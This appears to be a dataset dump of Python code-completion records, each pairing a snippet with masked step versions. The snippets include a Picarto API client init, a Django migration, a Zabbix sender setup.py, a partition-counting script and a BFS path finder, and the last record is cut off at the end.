code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
# coding: utf-8
"""
Picarto.TV API Documentation
The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details
OpenAPI spec version: 1.2.5
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into sdk package
from .models.basic_channel_info import BasicChannelInfo
from .models.basic_follower_info import BasicFollowerInfo
from .models.basic_following_info import BasicFollowingInfo
from .models.categories import Categories
from .models.category import Category
from .models.channel_details import ChannelDetails
from .models.channel_search_results import ChannelSearchResults
from .models.channel_video import ChannelVideo
from .models.channel_videos import ChannelVideos
from .models.description_panel import DescriptionPanel
from .models.event import Event
from .models.events import Events
from .models.language import Language
from .models.languages import Languages
from .models.mobile_notify_settings import MobileNotifySettings
from .models.multi_participant import MultiParticipant
from .models.notification import Notification
from .models.notification_1 import Notification1
from .models.notifications import Notifications
from .models.online_channels import OnlineChannels
from .models.online_details import OnlineDetails
from .models.online_notify_settings import OnlineNotifySettings
from .models.thumbnail import Thumbnail
from .models.user_data import UserData
from .models.user_email_settings import UserEmailSettings
from .models.video_search_result import VideoSearchResult
from .models.video_search_results import VideoSearchResults
from .models.webhook import Webhook
# import apis into sdk package
from .apis.bot_api import BotApi
from .apis.channel_api import ChannelApi
from .apis.multistream_api import MultistreamApi
from .apis.public_api import PublicApi
from .apis.sensitive_api import SensitiveApi
from .apis.user_api import UserApi
from .apis.webhook_api import WebhookApi
# import ApiClient
from .api_client import ApiClient
from .configuration import Configuration
configuration = Configuration()
|
normal
|
{
"blob_id": "939011fca968d5f9250beb29a0bb700200e637df",
"index": 6274,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nconfiguration = Configuration()\n",
"step-3": "<mask token>\nfrom __future__ import absolute_import\nfrom .models.basic_channel_info import BasicChannelInfo\nfrom .models.basic_follower_info import BasicFollowerInfo\nfrom .models.basic_following_info import BasicFollowingInfo\nfrom .models.categories import Categories\nfrom .models.category import Category\nfrom .models.channel_details import ChannelDetails\nfrom .models.channel_search_results import ChannelSearchResults\nfrom .models.channel_video import ChannelVideo\nfrom .models.channel_videos import ChannelVideos\nfrom .models.description_panel import DescriptionPanel\nfrom .models.event import Event\nfrom .models.events import Events\nfrom .models.language import Language\nfrom .models.languages import Languages\nfrom .models.mobile_notify_settings import MobileNotifySettings\nfrom .models.multi_participant import MultiParticipant\nfrom .models.notification import Notification\nfrom .models.notification_1 import Notification1\nfrom .models.notifications import Notifications\nfrom .models.online_channels import OnlineChannels\nfrom .models.online_details import OnlineDetails\nfrom .models.online_notify_settings import OnlineNotifySettings\nfrom .models.thumbnail import Thumbnail\nfrom .models.user_data import UserData\nfrom .models.user_email_settings import UserEmailSettings\nfrom .models.video_search_result import VideoSearchResult\nfrom .models.video_search_results import VideoSearchResults\nfrom .models.webhook import Webhook\nfrom .apis.bot_api import BotApi\nfrom .apis.channel_api import ChannelApi\nfrom .apis.multistream_api import MultistreamApi\nfrom .apis.public_api import PublicApi\nfrom .apis.sensitive_api import SensitiveApi\nfrom .apis.user_api import UserApi\nfrom .apis.webhook_api import WebhookApi\nfrom .api_client import ApiClient\nfrom .configuration import Configuration\nconfiguration = Configuration()\n",
"step-4": "# coding: utf-8\n\n\"\"\"\n Picarto.TV API Documentation\n\n The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details \n\n OpenAPI spec version: 1.2.5\n Contact: [email protected]\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\n# import models into sdk package\nfrom .models.basic_channel_info import BasicChannelInfo\nfrom .models.basic_follower_info import BasicFollowerInfo\nfrom .models.basic_following_info import BasicFollowingInfo\nfrom .models.categories import Categories\nfrom .models.category import Category\nfrom .models.channel_details import ChannelDetails\nfrom .models.channel_search_results import ChannelSearchResults\nfrom .models.channel_video import ChannelVideo\nfrom .models.channel_videos import ChannelVideos\nfrom .models.description_panel import DescriptionPanel\nfrom .models.event import Event\nfrom .models.events import Events\nfrom .models.language import Language\nfrom .models.languages import Languages\nfrom .models.mobile_notify_settings import MobileNotifySettings\nfrom .models.multi_participant import MultiParticipant\nfrom .models.notification import Notification\nfrom .models.notification_1 import Notification1\nfrom .models.notifications import Notifications\nfrom .models.online_channels import OnlineChannels\nfrom .models.online_details import OnlineDetails\nfrom .models.online_notify_settings import OnlineNotifySettings\nfrom .models.thumbnail import Thumbnail\nfrom .models.user_data import UserData\nfrom .models.user_email_settings import UserEmailSettings\nfrom .models.video_search_result import VideoSearchResult\nfrom .models.video_search_results import VideoSearchResults\nfrom .models.webhook import Webhook\n\n# import apis into sdk package\nfrom .apis.bot_api import BotApi\nfrom .apis.channel_api import ChannelApi\nfrom .apis.multistream_api import MultistreamApi\nfrom .apis.public_api import PublicApi\nfrom .apis.sensitive_api import SensitiveApi\nfrom .apis.user_api import UserApi\nfrom .apis.webhook_api import WebhookApi\n\n# import ApiClient\nfrom .api_client import ApiClient\n\nfrom .configuration import Configuration\n\nconfiguration = Configuration()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.2.5 on 2021-08-05 07:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('organization', '0010_auto_20210801_1623'),
('quote', '0004_auto_20210805_1032'),
]
operations = [
migrations.CreateModel(
name='FollowUp',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),
('text', models.TextField(default=None, verbose_name='متن پیگیری')),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),
('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),
],
),
]
|
normal
|
{
"blob_id": "f2c53efa4b7c2df592582e3093ff269b703be1e0",
"index": 3054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-5": "# Generated by Django 3.2.5 on 2021-08-05 07:19\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('organization', '0010_auto_20210801_1623'),\n ('quote', '0004_auto_20210805_1032'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FollowUp',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),\n ('text', models.TextField(default=None, verbose_name='متن پیگیری')),\n ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
word = input()
if word[0].islower():
print('{}{}'.format(word[0].upper(), word[1:]))
sys.exit()
else:
print(word)
sys.exit()
|
normal
|
{
"blob_id": "227e78312b5bad85df562b6ba360de352c305e7b",
"index": 3913,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-3": "<mask token>\nword = input()\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-4": "import sys\nword = input()\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
import os
import sys
from setuptools import setup
from textwrap import dedent
NAME = "docker-zabbix-script-sender"
GITHUB_ORG_URL = "https://github.com/troptop/"
ROOT_DIR = os.path.dirname(__file__)
SOURCE_DIR = os.path.join(ROOT_DIR)
exec(open('docker_zabbix_script_sender/version.py').read())
setup(
name=NAME,
version=version,
author="Cyril Moreau",
author_email="[email protected]",
url= GITHUB_ORG_URL + '/' + NAME,
download_url="{0}/{1}/tarball/v{2}".format(GITHUB_ORG_URL, NAME, version),
description="Push Docker containers script results to Zabbix efficiently",
long_description=dedent("""
Rationale
---------
Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.
It leverages 3 interesting components:
- Zabbix maintains a tool titled ``zabbix-sender``.
It is meant to push `Zabbix trapper items`_ efficiently.
- Develop your own scripts to monitor your docker container
- Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.
It allows the client to subscribe to a live feed delivering a container statistics.
The daemon script stands in the middle of those 3 components.
It collects Docker containers statistics and transforms them in Zabbix trapper events.
Published metrics
-----------------
The daemon script does not publish any statistic yet.
You have to develop your own script
Documentation
-------------
The stable documentation is available on ReadTheDocs_
"""),
keywords="docker zabbix monitoring",
packages=['docker_zabbix_script_sender'],
install_requires=[
'docker-py >= 1.0.0',
],
zip_safe=False,
license="Apache license version 2.0",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
],
entry_points = """
[console_scripts]
docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run
"""
)
|
normal
|
{
"blob_id": "0769003c248c099da5bcd75541d35234b01af5de",
"index": 2723,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-3": "<mask token>\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-4": "import os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-5": "#!/usr/bin/env python\nimport os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\n\nNAME = \"docker-zabbix-script-sender\"\nGITHUB_ORG_URL = \"https://github.com/troptop/\"\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\nexec(open('docker_zabbix_script_sender/version.py').read())\n\nsetup(\n name=NAME,\n version=version,\n author=\"Cyril Moreau\",\n author_email=\"[email protected]\",\n url= GITHUB_ORG_URL + '/' + NAME,\n download_url=\"{0}/{1}/tarball/v{2}\".format(GITHUB_ORG_URL, NAME, version),\n description=\"Push Docker containers script results to Zabbix efficiently\",\n long_description=dedent(\"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"),\n keywords=\"docker zabbix monitoring\",\n packages=['docker_zabbix_script_sender'],\n install_requires=[\n 'docker-py >= 1.0.0',\n ],\n zip_safe=False,\n license=\"Apache license version 2.0\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points = \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#Title: Counting summations
import math
limit = 201
comboList = dict()
alphabet = range(1, limit)
searchAlphabet = set(alphabet)
def concat(a, b):
return "%i %i" % (a, b)
def split(n, min=1, tab=6):
if concat(n,min) in comboList.keys():
if tab == 6:
print " %sn = %i, min = %i, %i" % (" "*tab, n, min, concat(n, min))
return comboList[concat(n,min)]
if int(n) < int(min + 1):
return 1
splitSum = 0
splitList = []
for i in range(len(alphabet)):
if alphabet[i] > n/2:
break
if (n - alphabet[i]) in alphabet and not alphabet[i] < min:
splitSum += split(n - alphabet[i], alphabet[i], tab - 1)
comboList[concat(n,min)] = splitSum + 1
return splitSum + 1
#print split(99) -1
#print split(100) -1
splits = []
for i in range(limit):
splits.append(split(i) - 1)
print "%i: %i" % (i, splits[i])
|
normal
|
{
"blob_id": "618a8430d50aeca1c4b9c3fba975be342cc1893f",
"index": 6348,
"step-1": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#Title: Counting summations\n\nimport math\n\nlimit = 201\ncomboList = dict()\nalphabet = range(1, limit)\nsearchAlphabet = set(alphabet)\ndef concat(a, b):\n\treturn \"%i %i\" % (a, b)\n\ndef split(n, min=1, tab=6):\n\tif concat(n,min) in comboList.keys():\n\t\tif tab == 6:\n\t\t\tprint \" %sn = %i, min = %i, %i\" % (\"\t\"*tab, n, min, concat(n, min))\n\t\treturn comboList[concat(n,min)]\n\tif int(n) < int(min + 1):\n\t\treturn 1\n\tsplitSum = 0\n\tsplitList = []\n\tfor i in range(len(alphabet)):\n\t\tif alphabet[i] > n/2:\n\t\t\tbreak\n\t\tif (n - alphabet[i]) in alphabet and not alphabet[i] < min:\n\t\t\tsplitSum += split(n - alphabet[i], alphabet[i], tab - 1)\n\tcomboList[concat(n,min)] = splitSum + 1\n\treturn splitSum + 1\n\n#print split(99) -1\n#print split(100) -1\nsplits = []\nfor i in range(limit):\n\tsplits.append(split(i) - 1)\n\tprint \"%i: %i\" % (i, splits[i])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from Graph import create_random_graph
def find_accessible_vertices_backwards(graph, end_vertex):
if end_vertex not in graph.parse_vertices():
raise ValueError("The end vertex is not in the graph.")
visited = []
queue = []
next_vertex = {}
distance_to_end = {}
queue.append(end_vertex)
visited.append(end_vertex)
distance_to_end[end_vertex] = 0
while len(queue) > 0:
y = queue[0]
queue = queue[1:]
for edge in graph.parse_inbound_edges(y):
if edge.source_id not in visited:
visited.append(edge.source_id)
queue.append(edge.source_id)
distance_to_end[edge.source_id] = distance_to_end[y] + 1
next_vertex[edge.source_id] = y
return next_vertex
def find_minimum_length_path(graph, start_vertex, end_vertex):
next_vertex = find_accessible_vertices_backwards(graph, end_vertex)
if start_vertex not in next_vertex.keys():
raise ValueError("There is no path from " + str(start_vertex) + " to " + str(end_vertex))
path = [start_vertex]
last_vertex = start_vertex
reached_end = False
while not reached_end:
path.append(next_vertex[last_vertex])
last_vertex = next_vertex[last_vertex]
if path[-1] == end_vertex:
reached_end = True
return path
def main():
random_graph = create_random_graph(5, 10)
print("THE GRAPH:")
for vertex in random_graph.parse_vertices():
for edge in random_graph.parse_outbound_edges(vertex):
print(edge)
print("\n")
next_vertex = find_accessible_vertices_backwards(random_graph, 1)
print(next_vertex.keys())
print("\n")
path = find_minimum_length_path(random_graph, 1, 4)
print(path)
main()
|
normal
|
{
"blob_id": "f882589729d74a910d20856d4dc02546fe316e0d",
"index": 2994,
"step-1": "<mask token>\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_accessible_vertices_backwards(graph, end_vertex):\n if end_vertex not in graph.parse_vertices():\n raise ValueError('The end vertex is not in the graph.')\n visited = []\n queue = []\n next_vertex = {}\n distance_to_end = {}\n queue.append(end_vertex)\n visited.append(end_vertex)\n distance_to_end[end_vertex] = 0\n while len(queue) > 0:\n y = queue[0]\n queue = queue[1:]\n for edge in graph.parse_inbound_edges(y):\n if edge.source_id not in visited:\n visited.append(edge.source_id)\n queue.append(edge.source_id)\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\n next_vertex[edge.source_id] = y\n return next_vertex\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\nmain()\n",
"step-4": "from Graph import create_random_graph\n\n\ndef find_accessible_vertices_backwards(graph, end_vertex):\n if end_vertex not in graph.parse_vertices():\n raise ValueError('The end vertex is not in the graph.')\n visited = []\n queue = []\n next_vertex = {}\n distance_to_end = {}\n queue.append(end_vertex)\n visited.append(end_vertex)\n distance_to_end[end_vertex] = 0\n while len(queue) > 0:\n y = queue[0]\n queue = queue[1:]\n for edge in graph.parse_inbound_edges(y):\n if edge.source_id not in visited:\n visited.append(edge.source_id)\n queue.append(edge.source_id)\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\n next_vertex[edge.source_id] = y\n return next_vertex\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\nmain()\n",
"step-5": "from Graph import create_random_graph\r\n\r\n\r\ndef find_accessible_vertices_backwards(graph, end_vertex):\r\n if end_vertex not in graph.parse_vertices():\r\n raise ValueError(\"The end vertex is not in the graph.\")\r\n\r\n visited = []\r\n queue = []\r\n next_vertex = {}\r\n distance_to_end = {}\r\n\r\n queue.append(end_vertex)\r\n visited.append(end_vertex)\r\n distance_to_end[end_vertex] = 0\r\n while len(queue) > 0:\r\n y = queue[0]\r\n queue = queue[1:]\r\n for edge in graph.parse_inbound_edges(y):\r\n if edge.source_id not in visited:\r\n visited.append(edge.source_id)\r\n queue.append(edge.source_id)\r\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\r\n next_vertex[edge.source_id] = y\r\n\r\n return next_vertex\r\n\r\n\r\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\r\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\r\n\r\n if start_vertex not in next_vertex.keys():\r\n raise ValueError(\"There is no path from \" + str(start_vertex) + \" to \" + str(end_vertex))\r\n\r\n path = [start_vertex]\r\n last_vertex = start_vertex\r\n reached_end = False\r\n while not reached_end:\r\n path.append(next_vertex[last_vertex])\r\n last_vertex = next_vertex[last_vertex]\r\n if path[-1] == end_vertex:\r\n reached_end = True\r\n\r\n return path\r\n\r\n\r\ndef main():\r\n random_graph = create_random_graph(5, 10)\r\n\r\n print(\"THE GRAPH:\")\r\n for vertex in random_graph.parse_vertices():\r\n for edge in random_graph.parse_outbound_edges(vertex):\r\n print(edge)\r\n\r\n print(\"\\n\")\r\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\r\n 